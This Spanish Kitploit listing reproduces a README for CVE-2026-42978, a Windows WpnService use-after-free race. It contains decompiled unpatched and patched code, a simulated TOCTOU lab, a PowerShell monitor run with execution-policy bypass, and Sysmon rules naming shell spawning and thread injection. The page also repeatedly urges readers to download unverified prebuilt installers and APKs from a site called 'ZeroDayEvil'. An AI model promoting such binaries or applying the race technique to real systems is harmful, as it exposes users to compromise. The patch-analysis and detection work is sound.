Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/syntaxmethod/cve-2026-42978-poc-research
Herramientas DefensivasEscalada de PrivilegiosEscáneres de VulnerabilidadesAnálisis de VulnerabilidadesExplotaciónInteligencia de AmenazasPapers e InvestigaciónAprendizaje y Educación

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHub
syntaxmethod/cve-2026-42978-poc-research

CVE-2026-42978-PoC-Research

CVE-2026-42978 Windows Push Notifications (WpnService) Use-After-Free y condición de carrera: investigación PoC, escáner de diagnóstico y módulo de auditoría de seguridad para AI Security Tool.

Ver RepositorioSitio web
13hace 17h 23mAún no revisado
Compartir

CVE-2026-42978
Módulo de Notificaciones Push de Windows para la Herramienta de Seguridad con IA

Ecosistema de Seguridad con IA de Nueva Generación, Terminal Multiprotocolo y Suite de Agentes Autónomos


Latest Release Build Status Donations Telegram Channel License

Sitio web · Documentación del producto · Aplicación anfitriona · Chat de la comunidad

Navegación del sitio web: Inicio · Actualizaciones · Descargas · Módulos

Module banner


Aplicación anfitriona oficial

Producto: AI Security Tool
Sitio: zerodayevil.github.io
Documentación: https://zerodayevil.github.io/ai-security-tool

Este módulo es un análisis revisado y un perfil de verificación segura para AI Security Tool.
Utilice únicamente los módulos listados en el sitio del proyecto o en el catálogo oficial. Cargue este módulo dentro de la aplicación aprobada, contra endpoints que usted posea o esté autorizado por escrito a evaluar.

Este repositorio no incluye un exploit armado contra WpnService. El laboratorio bajo lab/ es una simulación independiente de la clase de vulnerabilidad (TOCTOU / doble lectura). No se comunica con el servicio real de notificaciones push.


Inicio rápido e instalación

Instale primero la aplicación anfitriona. Luego habilite este módulo desde Módulos → Windows / EoP Local → CVE-2026-42978.

Compilaciones listas para usar

SO / plataformaVersiónArquitectura / formatoActualizadoEstadoDescarga
Windowsv6.3.20Instalador x64 (.exe)2026-09-08ÚltimaDescargar .exe
Windowsv6.3.20Portátil x64 (.tar.gz)2026-09-08ÚltimaDescargar .tar.gz
macOSv5.3.29Apple Silicon (.dmg)2026-09-05EstableDescargar .dmg
Linuxv5.3.27Universal x64 (.tar.gz)2026-09-01EstableDescargar .tar.gz
Androidv5.3.27APK ARM64 (.apk)2026-09-01EstableDescargar .apk

Solo fuentes oficiales:

  • https://zerodayevil.github.io/
  • https://zerodayevil.github.io/ai-security-tool
  • https://github.com/ZeroDayEvil/ai-security-tool

Descripción conceptual

CVE-2026-42978 es una elevación de privilegios local en las Notificaciones Push de Windows. Microsoft describe el acceso concurrente a un recurso compartido sin la sincronización adecuada (CWE-362). La investigación sobre wpncore.dll parcheado vs. sin parchear muestra una condición de carrera de use-after-free en PresentationEndpointFacade durante el apagado de la plataforma.

WpnService se ejecuta en la sesión 0 como NT AUTHORITY\SYSTEM (svchost.exe -k netsvcs -p). La entrega de notificaciones toast, mosaico e insignia pasa por él. Ganar la carrera contra ese proceso es un problema de SYSTEM en la máquina local — no un fallo remoto de pre-autenticación en un DC.

Estado: parcheado el 10 de junio de 2026 (Patch Tuesday). Esta página es investigación defensiva.

No es CVE-2026-41089 (RCE de Netlogon). Componente diferente, modelo de privilegios diferente, fecha de parche diferente.


Especificaciones

CampoValor
CVECVE-2026-42978
BDUBDU:2026-08249
Aviso del proveedorMSRC — Windows Push Notifications EoP
SeveridadAlta · CVSS 3.1 7.8
DebilidadCondición de carrera CWE-362 · use-after-free en la ruta de apagado
ComponenteWindows Push Notifications · WpnService · wpncore.dll
Vector de ataqueLocal
Privilegios requeridosBajos (usuario local autorizado)
Interacción del usuarioNinguna
Patch Tuesday10 de junio de 2026
Tipo de móduloAnálisis de investigación + verificación segura en la aplicación + paquete de detección

Alcance

SKUs de cliente y servidor que incluyen Push Notifications. Confirme el KB exacto en MSRC antes de cerrar un ticket.

FamiliaNotas
Windows 101809, 21H2, 22H2 (x86 / x64 / ARM64 según corresponda)
Windows 1123H2, 24H2, 25H2, 26H1
Windows Server2016 / 2019 / 2022 / 2025 (completo y Server Core donde exista el componente)

Compilaciones orientativas según notas de servicio públicas (verifique siempre en MSRC):

RamaCompilación parcheada indicativa
Windows 11 23H222631.7219
Windows 11 24H226100.8655
Windows 11 25H226200.8655
Windows 11 26H128000.2269
Ejemplo de wpncore.dll (24H2)vulnerable 26100.8521 → parcheado 26100.8655

Causa raíz (investigación)

La fachada envuelve las llamadas a la API de notificaciones y delega en PresentationEndpointImpl. Durante el apagado de la plataforma, el objeto NotificationPlatform se destruye. Varios métodos de la fachada tomaban históricamente un puntero a la plataforma sin una bandera de apagado ni un bloqueo compartido. Si el desmontaje gana la carrera, la siguiente llamada utiliza un puntero colgante.

Facade, platform, shutdown guard

El mismo patrón de bloqueo y guarda se aplicó en 49 métodos PresentationEndpointFacade::*. Los métodos de implementación subyacentes se dejaron como estaban — el agujero estaba en la fachada.

Forma sin parchear (wpncore.dll 26100.8521)

root@kitploit:~
// PresentationEndpointFacade::ToastUnblockAll — unpatched
long ToastUnblockAll(PresentationEndpointFacade *this) {
    NotificationPlatformHandle::Get(this + 0x50);
    if (platform == NULL)
        Throw_Hr(...);
    return PresentationEndpointImpl::UnblockToastsForEachApp(...);
}

Forma parcheada (wpncore.dll 26100.8655)

root@kitploit:~
// PresentationEndpointFacade::ToastUnblockAll — patched
long ToastUnblockAll(PresentationEndpointFacade *this) {
    if (Feature_4097557817::IsEnabled()) {
        AcquireSRWLockShared(&Wns::s_platformLock);
        if (Wns::s_platformShutdown)
            Throw_Hr(E_APPLICATION_EXITING);
        NotificationPlatformHandle::Get(this + 0x50);
        ReleaseSRWLockShared(&Wns::s_platformLock);
    }
}

Ghidra with unpatched and patched wpncore.dll open

Lo que añade el parche:

  1. AcquireSRWLockShared — bloqueo de lectores-escritores; el apagado toma el exclusivo.
  2. s_platformShutdown — aborta con E_APPLICATION_EXITING si el desmontaje ha comenzado.
  3. Liberación RAII mediante WIL unique_storage, de modo que el bloqueo se libera en rutas de excepción.
  4. Bandera de característica Feature_4097557817 para despliegue por fases / reversión.

Escala del diff binario

CategoríaFunciones de ejemplo
ToastToastUnblockAll, ToastCreateSession, ToastCloseSession, ToastRequestAllNotifications, ToastSuppress
MosaicoTileCreateSession, TileCloseSession, TileRequestResourceForeground
RegistroRegisterApplication, UnregisterApplication, RegisterHandler, UpdateRegistration
ConfiguraciónChangeAppSetting, QueryAppSetting, QueryGlobalSetting
EntregaDeliver, GetPayloadForNotificationId, Submit, PostScheduledNotification
ConsultasGetRegisteredHandler, GetSettingsFromHandler, GetAssetsFromHandler

Notas de PE de reports/:

  • .text creció 18.432 bytes
  • .data creció 96 bytes (Wns::s_platformLock, Wns::s_platformShutdown)
  • sin nuevas importaciones — las API de bloqueo SRW ya estaban presentes
  • nuevo destructor RAII para la liberación del bloqueo exclusivo

Impacto

WpnService es SYSTEM. Si se gana la carrera, una llamada a vtable colgante puede convertirse en ejecución de código SYSTEM local. Ese paso — heap spray, secuestro de vtable, payload — está fuera del alcance aquí.

Este módulo es para comprensión de la causa raíz, verificación de parches y detección.


Uso de este módulo dentro de AI Security Tool

  1. Instale una compilación oficial actual desde zerodayevil.github.io.
  2. Abra Módulos → CVE-2026-42978.
  3. Apunte la verificación a endpoints Windows autorizados.
  4. Trate el resultado como presencia de parche / postura de WPN, no como "disparar la carrera".
  5. Opcionalmente, recopile el paquete de detección (detection/) en una máquina de laboratorio.

No ejecute bucles de fallo o de carrera contra WpnService en producción.

root@kitploit:~
authorized operator
        │
        ▼
 AI Security Tool  →  module 42978
        │
        ▼
 authorized Windows endpoint
        │
        ├─ patch / wpncore.dll age
        └─ SIEM / Sysmon / Event Log notes

Laboratorio TOCTOU (solo servicio simulado)

lab/ es una demostración en C independiente de doble lectura / TOCTOU. Utiliza una tubería con nombre y memoria compartida. No carga wpncore.dll y no inicia ni detiene WpnService.

  • vulnerable_service.exe — valida una longitud, duerme, vuelve a leer la longitud.
  • race_attacker.exe — cambia el valor compartido durante esa ventana.
  • --patched — lectura única en una variable local; el mismo atacante debería ver cero carreras.

Requiere GCC (MinGW). Desde lab/:

root@kitploit:~
build.bat

Terminal 1: vulnerable_service.exe
Terminal 2: race_attacker.exe 5
Luego compare con vulnerable_service.exe --patched.

TOCTOU race condition demo


Detección y búsqueda de amenazas

Monitor ETW — detection/etw_wpn_monitor.ps1

Siete comprobaciones:

  1. Estado y PID de WpnService
  2. Historial de fallos / reinicios
  3. Ráfaga en el registro de eventos de Push Notifications Platform
  4. Tuberías con nombre relacionadas con WPN
  5. Indicador de parche (fecha / compilación de wpncore.dll)
  6. Procesos con módulos WPN cargados
  7. Auditoría de junctions / enlaces simbólicos bajo rutas de datos de notificaciones
root@kitploit:~
powershell -ExecutionPolicy Bypass .\detection\etw_wpn_monitor.ps1

ETW monitor output

Sysmon — detection/sysmon_wpn_race_detect.xml

ReglaPara qué sirve
WPN_EoP_ChildProcesssvchost (netsvcs) generando cmd / powershell / wscript
WPN_PipeAccessConexiones a tuberías con nombre relacionadas con WPN
WPN_FileCreationCreación de archivos bajo directorios de datos de notificaciones
WPN_RegistryTamperingEscrituras bajo claves de PushNotifications
WPN_ProcessAccessPROCESS_ALL_ACCESS a svchost
WPN_ThreadInjectionCreateRemoteThread en svchost
root@kitploit:~
sysmon64.exe -accepteula -i detection\sysmon_wpn_race_detect.xml

Visor de eventos

Canal: Microsoft-Windows-PushNotifications-Platform/Operational

  • Evento 1225 — comandos WPN a nivel de transporte
  • Tasa de ráfaga (por ejemplo >20/min) — merece una mirada, no una condena
  • Error / Crítico — posible fallo por un intento fallido

Event Viewer WPN operational log


Lista de verificación de mitigación

  • Actualización acumulativa de junio de 2026 en cada SKU dentro del alcance
  • La compilación de wpncore.dll coincide con la fila parcheada para esa rama
  • EDR / Sysmon en estaciones de trabajo y jump boxes, no solo en DCs
  • Alerta cuando svchost -k netsvcs genera un shell
  • Resultado del módulo de la aplicación anfitriona archivado con el inventario de hotfixes

Si etw_wpn_monitor.ps1 indica sin parchear — instale la actualización de junio de 2026 y vuelva a verificar.


CVE relacionados (clúster WPN de junio de 2026)

CVEClase
CVE-2026-42977EoP · carrera
CVE-2026-42978EoP · carrera (este módulo)
CVE-2026-42979EoP · carrera
CVE-2026-42991EoP · carrera
CVE-2026-42969Divulgación de información · carrera
CVE-2026-42970Divulgación de información · carrera
CVE-2026-42973Divulgación de información · carrera
CVE-2026-26167EoP
CVE-2026-32160EoP

Estructura del repositorio

root@kitploit:~
CVE-2026-42978/
├── README.md
├── LICENSE
├── lab/
│   ├── vulnerable_service.c
│   ├── race_attacker.c
│   └── build.bat
├── detection/
│   ├── etw_wpn_monitor.ps1
│   └── sysmon_wpn_race_detect.xml
└── reports/
    ├── PE_DIFF_REPORT.txt
    └── FUNCTION_DIFF_REPORT.txt

Requisitos: Windows 10/11 para los scripts de detección · MinGW para el laboratorio simulado · Sysmon opcional.

Las capturas de pantalla de este README se cargan desde URLs de imágenes públicas. No están almacenadas en este árbol.


Referencias

  • MSRC — CVE-2026-42978
  • Registro CVE
  • BDU:2026-08249

Catálogo de módulos de seguridad

Ejecución remota de código y problemas de red 4 modules
  • CVE-2026-41089 — Módulo de Netlogon de Windows · @ZeroDayEvil
  • CVE-2026-20805 — Módulo RCE de Windows · @ZeroDayEvil
  • CVE-2026-41096 — Módulo de verificación de RCE crítico · @ZeroDayEvil
  • CVE-2026-24291 — Módulo de protocolo de red · @ZeroDayVPN
Escalada de privilegios y servicios 2 modules
  • CVE-2026-66804 — EoP del servicio CrossDevice · @ZeroDayVPN
  • CVE-2026-42978 — EoP de Notificaciones Push de Windows (este repositorio) · @ZeroDayEvil
Investigación y análisis 2 modules
  • CVE-2026-50416 — Análisis de escalada de privilegios local · @ZeroDayEvil
  • CVE-2026-83991 — Módulo de análisis · @ZeroDayVPN

Contribución y comunidad

Trabajo útil:

  1. Datos — compilaciones de MSRC, CVE hermanos en el clúster WPN de junio.
  2. Detección — Sigma, mejor ETW, recomendaciones de ASR.
  3. Metadatos y traducciones de la aplicación anfitriona.
  4. Documentación y correcciones de enlaces rotos.

No abra un PR que añada un exploit armado de WpnService, un asistente de heap-spray o un PoC de exploit contra el servicio en vivo.


Contacto y soporte

  • Sitio web: zerodayevil.github.io
  • Documentación del producto: zerodayevil.github.io/ai-security-tool
  • Administrador de Telegram: @ZeroDayEvil
  • Chat de Telegram: @ZeroDyaTool_chat
  • Canal de Telegram: @ZeroDyaTool_channel
  • Open Collective: opencollective.com/ZeroDayEvil

Licencia y legal

Publicado bajo la Licencia MIT. Consulte LICENSE.

Solo para investigación defensiva autorizada y administración de sistemas.
Las pruebas de escalada de privilegios local sin autorización por escrito son ilegales.

La vulnerabilidad está parcheada. Mantenga Windows actualizado. Este repositorio no incluye un exploit armado contra el servicio en vivo.


AI Security Tool — flujo de trabajo de terminal y automatización para profesionales de ciberseguridad.

Módulo defensivo para zerodayevil.github.io · Sin exploit independiente de WpnService · Verifique los datos en MSRC

Descargar herramienta